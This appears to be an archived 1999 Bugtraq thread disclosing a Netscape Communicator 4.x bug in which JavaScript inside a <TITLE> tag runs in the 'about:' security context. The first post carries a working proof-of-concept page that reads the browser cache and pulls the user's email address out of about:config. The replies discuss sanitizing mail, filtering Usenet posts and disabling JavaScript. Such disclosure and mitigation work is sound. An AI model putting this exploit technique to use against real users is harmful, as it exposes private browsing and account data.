netscape.title.tag.about.txt

1999-08-17T00:00:00
ID PACKETSTORM:11936
Type packetstorm
Reporter Georgi Guninski
Modified 1999-08-17T00:00:00

Description

                                        
                                            `Date: Mon, 24 May 1999 14:24:13 +0300  
From: Georgi Guninski <joro@NAT.BG>  
To: BUGTRAQ@netspace.org  
Subject: Netscape Communicator JavaScript in <TITLE> security vulnerability  
  
There is a security bug in Netscape Communicator 4.6 Win95, 4.07 Linux  
(guess all 4.x versions are affected) in the way they treat JavaScript  
code in the title of the document.  
  
One may embed JavaScript code in the <TITLE> tag. If the info about the  
document is shown, then the JavaScript code is executed. The info about the  
document may be infoked by a script using 'location="wysiwyg://1/about:document" '.  
  
The problem is that the JavaScript code is executed in the security context  
of the "about:" protocol. This allows accessing documents in the "about:"  
protocol such as: "about:cache", "about:config", "about:global", etc.  
  
Vulnerabilities:  
* Reading user's cache and accessing information such as passwords,  
credit card numbers.  
* Reading info about the Netscape's configuration ("about:config").  
This includes finding user's email address, mail servers, the encoded mail password  
(it must me saved and may be decoded). This allows reading user's email.  
  
The more dangerous part is that this vulnerability MAY BE EXPLOITED  
USING HTML MAIL MESSAGE.  
  
  
Workaround: Disable JavaScript  
  
Demonstration is available at: http://www.nat.bg/~joro/titlecache.html  
  
Georgi Guninski  
http://www.nat.bg/~joro  
http://www.whitehats.com/guninski  
  
----------------------------------------------------------------------------------------  
  
<http://www.nat.bg/~joro/titlecache.html>  
  
<HTML>  
<HEAD>  
<TITLE>  
<SCRIPT>  
  
a=window.open('wysiwyg://1/about:cache');  
s='Here are some links in your cache: \n';  
for(i=0;i<7;i++)  
s += a.document.links[i] + '\n';   
a.close();  
alert(s);  
  
  
a=window.open('wysiwyg://1/about:config');  
  
mag='mail.identity.useremail = ';  
mend='general.title_tips';  
res=mag;  
charstoread=20;  
  
alert('Will try to find your email. May take some time.');  
  
function readit() {  
for(i=0;i<charstoread;i++) {  
t=res;  
a.find(mend);  
for(c=1;c<256;c++) {  
t=res + String.fromCharCode(c);  
  
if (a.find(t,true,true)) {  
/* alert(c); */  
res=t;  
}   
}  
}  
res=res.substring(mag.length);  
a.close();  
alert("Your email is :\n" + res);  
}  
  
setTimeout("readit()",3000);  
</SCRIPT>  
</TITLE>  
</HEAD>  
  
<body>  
  
There is a security bug in Netscape Communicator 4.6 Win95, 4.07 Linux  
(guess all 4.x versions are affected) in the way they treat JavaScript  
code in the title of the document.  
<p>One may embed JavaScript code in the TITLE tag. If the info about  
the document  
<br>is shown, then the JavaScript code is executed. The info about the  
document may be infoked by a script using 'location="wysiwyg://1/about:document"  
'.  
<p>The problem is that the JavaScript code is executed in the security  
context of the "about:" protocol. This allows accessing documents in the  
"about:" protocol such as: "about:cache", "about:config", "about:global",  
etc.  
<p>Vulnerabilities:  
<br> * Reading user's cache and accessing information such as passwords,  
credit card numbers.  
<br> * Reading info about the Netscape's configuration ("about:config").  
This includes  finding user's email address, mail servers, the encoded  
mail password   (it must me saved and may be decoded). This allows  
reading user's email.  
<br>  
The more dangerous part is that this vulnerability MAY BE EXPLOITED USING HTML MAIL MESSAGE.  
<br>  
  
  
<p>Workaround: Disable JavaScript  
<br>  
<a href="index.html">Go to Georgi Guninski's home page</a>  
<br>  
<br>  
  
<SCRIPT>  
location="wysiwyg://1/about:document";  
</SCRIPT>  
  
  
</body>  
</HTML>  
  
----------------------------------------------------------------------------------------  
  
Date: Mon, 24 May 1999 10:23:06 -0700  
From: John D. Hardin <jhardin@WOLFENET.COM>  
To: BUGTRAQ@netspace.org  
Subject: Re: Netscape Communicator JavaScript in <TITLE> security vulnerability  
  
On Mon, 24 May 1999, Georgi Guninski wrote:  
  
> Vulnerabilities:  
> * Reading user's cache and accessing information such as passwords,  
> credit card numbers.  
> * Reading info about the Netscape's configuration ("about:config").  
> This includes finding user's email address, mail servers, the  
> encoded mail password (it must me saved and may be decoded). This  
> allows reading user's email.  
>  
> The more dangerous part is that this vulnerability MAY BE EXPLOITED  
> USING HTML MAIL MESSAGE.  
  
...unless you're sanitizing your email. Anybody using an HTML-enabled  
mail client should at least be aware of the availability of this tool:  
  
ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html  
  
--  
John Hardin KA7OHZ jhardin@wolfenet.com  
pgpk -a finger://gonzo.wolfenet.com/jhardin PGP key ID: 0x41EA94F5  
PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76  
-----------------------------------------------------------------------  
In the Lion  
the Mighty Lion  
the Zebra sleeps tonight...  
Dee de-ee-ee-ee-ee de de de we um umma way!  
-----------------------------------------------------------------------  
9 days until Crusade: the Babylon Project  
  
----------------------------------------------------------------------------------------  
  
Date: Tue, 25 May 1999 12:30:52 -0600  
From: Brett Glass <brett@LARIAT.ORG>  
To: BUGTRAQ@netspace.org  
Subject: Re: Netscape Communicator JavaScript in <TITLE> security vulnerability  
  
John's recipes are great tools; we recommend them. Only one problem:  
Procmail does not work on NetNews. (If this exploit works in mail it  
almost certainly works in news.... Scary thought.)  
  
--Brett Glass  
  
At 10:23 AM 5/24/99 -0700, John D. Hardin wrote:  
>On Mon, 24 May 1999, Georgi Guninski wrote:  
>  
> > Vulnerabilities:  
> > * Reading user's cache and accessing information such as passwords,  
> > credit card numbers.  
> > * Reading info about the Netscape's configuration ("about:config").  
> > This includes finding user's email address, mail servers, the  
> > encoded mail password (it must me saved and may be decoded). This  
> > allows reading user's email.  
> >  
> > The more dangerous part is that this vulnerability MAY BE EXPLOITED  
> > USING HTML MAIL MESSAGE.  
>  
>...unless you're sanitizing your email. Anybody using an HTML-enabled  
>mail client should at least be aware of the availability of this tool:  
>  
> ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html  
>  
>--  
> John Hardin KA7OHZ jhardin@wolfenet.com  
> pgpk -a finger://gonzo.wolfenet.com/jhardin PGP key ID: 0x41EA94F5  
> PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76  
>-----------------------------------------------------------------------  
> In the Lion  
> the Mighty Lion  
> the Zebra sleeps tonight...  
> Dee de-ee-ee-ee-ee de de de we um umma way!  
>-----------------------------------------------------------------------  
> 9 days until Crusade: the Babylon Project  
  
----------------------------------------------------------------------------------------  
  
Date: Tue, 25 May 1999 21:40:43 -0400  
From: Forrest J. Cavalier III <mibsoft@mibsoftware.com>  
To: BUGTRAQ@netspace.org  
Subject: Re: Netscape Communicator JavaScript in <TITLE> security  
  
> John's recipes are great tools; we recommend them. Only one problem:  
> Procmail does not work on NetNews. (If this exploit works in mail it  
> almost certainly works in news.... Scary thought.)  
>  
> --Brett Glass  
>  
  
I don't know if the exploit works with Usenet messages, but  
decent Usenet servers have filtering capabilities.  
  
INN had perl filtering hooks since at least 1995,  
and had easily modified code to analyze and reject  
messages based on headers since the beginning (1993.)  
  
In Usenet, generally most sites do not modify  
and sanitize messages, they just drop and reject them  
with just a message to the log, nothing else. Since  
propagating modified messages, for whatever reason, is  
never acceptable, it becomes a problem to sanitize:  
it would mean keeping additional special copies around.  
  
A full Usenet feed is on the order of 1E6 messages  
per day, and nearly all are binaries (UUEncoded) The John D.  
Hardin code looks solid, but might bog down a server  
if every Usenet message had to go through it.  
  
Personally, I don't think HTML (or binaries) belong  
on Usenet in the first place, so it's a simple policy  
to just drop posts containing HTML or UUencoding. :-)  
  
Seriously, the Hardin perl code will drop pretty easily  
into INN, although I haven't tried it myself.  
See README.perl_hook in the INN distribution and  
modify the procmail selector lines to the appropriate  
perl instead, and return a reject code instead of  
mangling and rewriting.  
  
Forrest J. Cavalier III, Mib Software, INN customization and  
consulting 'Pay-as-you-go' commercial support for INN: Only $64/hour!  
Searchable hypertext INN docs, FAQ, RFCs, etc: 650+ pages:  
http://www.mibsoftware.com/innsup.htm  
  
----------------------------------------------------------------------------------------  
  
Date: Tue, 25 May 1999 22:32:25 -0400  
From: Usman <akeju00@IONAPREP.ORG>  
To: BUGTRAQ@netspace.org  
Subject: Re: Netscape Communicator JavaScript in <TITLE> securityvulnerability  
  
"John D. Hardin" wrote:  
>  
> On Mon, 24 May 1999, Georgi Guninski wrote:  
>>snip!<<  
> > The more dangerous part is that this vulnerability MAY BE EXPLOITED  
> > USING HTML MAIL MESSAGE.  
>  
> ...unless you're sanitizing your email. Anybody using an HTML-enabled  
> mail client should at least be aware of the availability of this tool:  
>  
> ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html  
>  
> --  
> John Hardin KA7OHZ jhardin@wolfenet.com  
  
  
Or, just to add the said workaround, if you're only worried about email,  
Netscape 4.5+ users can just disable JavaScript for Mail and News without  
disabling JavaScript altoghether. I know there's still the meta refresh factor  
for HTML-enabled mail clients, though. It would be, IMHO, a good idea for  
Netscape to add a little "Disable/Enable HTML for Mail Messages" checkbox, don't  
you think?  
  
-Usman Akeju  
  
----------------------------------------------------------------------------------------  
  
Date: Sat, 12 Jun 1999 22:58:26 -0700  
From: John D. Hardin <jhardin@WOLFENET.COM>  
To: BUGTRAQ@netspace.org  
Subject: Re: Netscape Communicator JavaScript in <TITLE> security  
  
On Thu, 27 May 1999, Aleph One wrote:  
  
> That doesn't really cut it. You can embed JavaScript into things  
> linke onClick, onLoad, etc. You need to kill all those as well.  
  
Thanks for pointing that out. I've updated the sanitizer to defang the  
event handlers explicitly, which saves blocking the <BODY> and <TITLE>  
tags themselves, and also protects links.  
  
The current release of the sanitizer is 1.84 and it is available at  
ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html  
  
--  
John Hardin KA7OHZ jhardin@wolfenet.com  
pgpk -a finger://gonzo.wolfenet.com/jhardin PGP key ID: 0x41EA94F5  
PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76  
-----------------------------------------------------------------------  
Efficiency can magnify good, but it magnifies evil just as well.  
So, we should not be surprised to find that modern electronic  
communication magnifies stupidity as *efficiently* as it magnifies  
intelligence.  
-- Robert A. Matern  
-----------------------------------------------------------------------  
89 days until 9/9/99  
  
`